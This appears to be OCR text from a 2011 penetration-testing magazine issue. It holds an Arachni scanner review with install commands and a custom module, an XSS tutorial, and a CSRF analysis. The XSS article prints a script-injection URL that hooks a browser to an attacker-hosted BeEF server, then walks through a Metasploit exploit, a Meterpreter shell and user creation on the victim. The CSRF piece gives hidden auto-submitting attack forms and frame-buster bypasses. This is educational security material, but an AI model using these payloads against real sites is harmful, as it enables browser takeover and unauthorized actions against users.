Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
